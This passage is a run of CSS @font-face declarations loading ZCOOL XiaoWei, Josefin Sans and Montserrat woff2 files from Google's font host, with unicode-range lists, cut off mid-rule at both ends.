U+7167, U+724c, U+738b, U+73a9, U+73af, U+7403, U+7537, U+754c, U+7559, U+767d, U+7740, U+786e, U+795e, U+798f, U+79f0, U+7aef, U+7b7e, U+7bb1, U+7ea2, U+7ea6, U+7ec4, U+7ec6, U+7ecd, U+7edc, U+7ef4, U+8003, U+80b2, U+81f3-81f4, U+822a, U+827a, U+82f1, U+83b7, U+8425, U+89c2, U+89c8, U+8ba9, U+8bb8, U+8bc6, U+8bd5, U+8be2, U+8be5, U+8bed, U+8c03, U+8d23, U+8d2d, U+8d34, U+8d70, U+8db3, U+8fbe, U+8fce, U+8fd1, U+8fde, U+9001, U+901f-9020, U+90a3, U+914d, U+91c7, U+94fe, U+9500, U+952e, U+9605, U+9645, U+9662, U+9664, U+9700, U+9752, U+975e, U+97f3, U+9879, U+9886, U+98df, U+9a6c, U+9a8c, U+9ed1, U+9f99;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.117.woff2) format(\'woff2\');unicode-range: U+4e, U+201c-201d, U+3010-3011, U+4e07, U+4e1c, U+4e24, U+4e3e, U+4e48, U+4e50, U+4e5f, U+4e8b-4e8c, U+4ea4, U+4eab-4eac, U+4ecb, U+4ece, U+4ed6, U+4ee3, U+4ef6-4ef7, U+4efb, U+4f20, U+4f55, U+4f7f, U+4fdd, U+505a, U+5143, U+5149, U+514d, U+5171, U+5177, U+518c, U+51fb, U+521b, U+5229, U+522b, U+52a9, U+5305, U+5317, U+534e, U+5355, U+5357, U+535a, U+5373, U+539f, U+53bb, U+53ca, U+53cd, U+53d6, U+53e3, U+53f0, U+5458, U+5546, U+56db, U+573a, U+578b, U+57ce, U+58f0, U+590d, U+5934, U+5973, U+5b57, U+5b8c, U+5b98, U+5bb9, U+5bfc, U+5c06, U+5c11, U+5c31, U+5c55, U+5df2, U+5e03, U+5e38, U+5e76, U+5e94, U+5efa, U+5f71, U+5f97, U+5feb, U+6001, U+603b, U+60f3, U+611f, U+6216, U+624d, U+6253, U+6295, U+6301, U+6392, U+641c, U+652f, U+653e, U+6559, U+6599, U+661f, U+671f, U+672f, U+6761, U+67e5, U+6807, U+6837, U+683c, U+6848, U+6b22, U+6b64, U+6bd4, U+6c14, U+6c34, U+6c42, U+6ca1, U+6d41, U+6d77, U+6d88, U+6e05, U+6e38, U+6e90, U+7136, U+7231, U+7531, U+767e, U+76ee, U+76f4, U+771f, U+7801, U+793a, U+79cd, U+7a0b, U+7a7a, U+7acb, U+7ae0, U+7b2c, U+7b80, U+7ba1, U+7cbe, U+7d22, U+7ea7, U+7ed3, U+7ed9, U+7edf, U+7f16, U+7f6e, U+8001, U+800c, U+8272, U+8282, U+82b1, U+8350, U+88ab, U+88c5, U+897f, U+89c1, U+89c4, U+89e3, U+8a00, U+8ba1, U+8ba4, U+8bae-8bb0, U+8bbe, U+8bc1, U+8bc4, U+8bfb, U+8d28, U+8d39, U+8d77, U+8d85, U+8def, U+8eab, U+8f66, U+8f6c, U+8f7d, U+8fd0, U+9009, U+90ae, U+90fd, U+91cc-91cd, U+91cf, U+95fb, U+9650, U+96c6, U+9891, U+98ce, U+ff1f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.118.woff2) format(\'woff2\');unicode-range: U+d, U+3e, U+5f, U+7c, U+a0, U+a9, U+4e09-4e0b, U+4e0d-4e0e, U+4e13, U+4e1a, U+4e2a, U+4e3a-4e3b, U+4e4b, U+4e86, U+4e8e, U+4ea7, U+4eba, U+4ee4-4ee5, U+4eec, U+4f1a, U+4f4d, U+4f53, U+4f5c, U+4f60, U+4fe1, U+5165, U+5168, U+516c, U+5173, U+5176, U+5185, U+51fa, U+5206, U+5230, U+5236, U+524d, U+529b, U+52a0-52a1, U+52a8, U+5316, U+533a, U+53cb, U+53d1, U+53ef, U+53f7-53f8, U+5408, U+540c-540e, U+544a, U+548c, U+54c1, U+56de, U+56fd-56fe, U+5728, U+5730, U+5907, U+5916, U+591a, U+5927, U+5929, U+597d, U+5982, U+5b50, U+5b66, U+5b89, U+5b9a, U+5b9e, U+5ba2, U+5bb6, U+5bf9, U+5c0f, U+5de5, U+5e02, U+5e73-5e74, U+5e7f, U+5ea6, U+5f00, U+5f0f, U+5f53, U+5f55, U+5fae, U+5fc3, U+6027, U+606f, U+60a8, U+60c5, U+610f, U+6210-6211, U+6237, U+6240, U+624b, U+6280, U+62a5, U+63a5, U+63a8, U+63d0, U+6536, U+6570, U+6587, U+65b9, U+65e0, U+65f6, U+660e, U+662d, U+662f, U+66f4, U+6700, U+670d, U+672c, U+673a, U+6743, U+6765, U+679c, U+682a, U+6b21, U+6b63, U+6cbb, U+6cd5, U+6ce8, U+6d3b, U+70ed, U+7247-7248, U+7269, U+7279, U+73b0, U+7406, U+751f, U+7528, U+7535, U+767b, U+76f8, U+770b, U+77e5, U+793e, U+79d1, U+7ad9, U+7b49, U+7c7b, U+7cfb, U+7ebf, U+7ecf, U+7f8e, U+8005, U+8054, U+80fd, U+81ea, U+85cf, U+884c, U+8868, U+8981, U+89c6, U+8bba, U+8bdd, U+8bf4, U+8bf7, U+8d44, U+8fc7, U+8fd8-8fd9, U+8fdb, U+901a, U+9053, U+90e8, U+91d1, U+957f, U+95e8, U+95ee, U+95f4, U+9762, U+9875, U+9898, U+9996, U+9ad8, U+ff01, U+ff08-ff09;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.119.woff2) format(\'woff2\');unicode-range: U+20-22, U+27-2a, U+2c-3b, U+3f, U+41-4d, U+4f-5d, U+61-7b, U+7d, U+ab, U+ae, U+b2, U+b7, U+bb, U+df-e5, U+e7-ea, U+ec-ed, U+f1-f4, U+f6, U+f9-fa, U+fc, U+101, U+103, U+113, U+12b, U+148, U+14d, U+16b, U+1ce, U+1d0, U+300-301, U+1ebf, U+1ec7, U+2013-2014, U+2022, U+2027, U+2039-203a, U+2122, U+3001-3002, U+3042, U+3044, U+3046, U+3048, U+304a-3055, U+3057, U+3059-305b, U+305d, U+305f-3061, U+3063-306b, U+306d-3073, U+3075-3076, U+3078-3079, U+307b, U+307e-307f, U+3081-308d, U+308f, U+3092-3093, U+30a1-30a4, U+30a6-30bb, U+30bd, U+30bf-30c1, U+30c3-30c4, U+30c6-30cb, U+30cd-30d7, U+30d9-30e1, U+30e3-30e7, U+30e9-30ed, U+30ef, U+30f3, U+30fb-30fc, U+3127, U+4e00, U+4e2d, U+65b0, U+65e5, U+6708-6709, U+70b9, U+7684, U+7f51, U+ff0c, U+ff0e, U+ff1a;}/* latin */@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1UFWaHi6WZ3Q.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 *//* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: 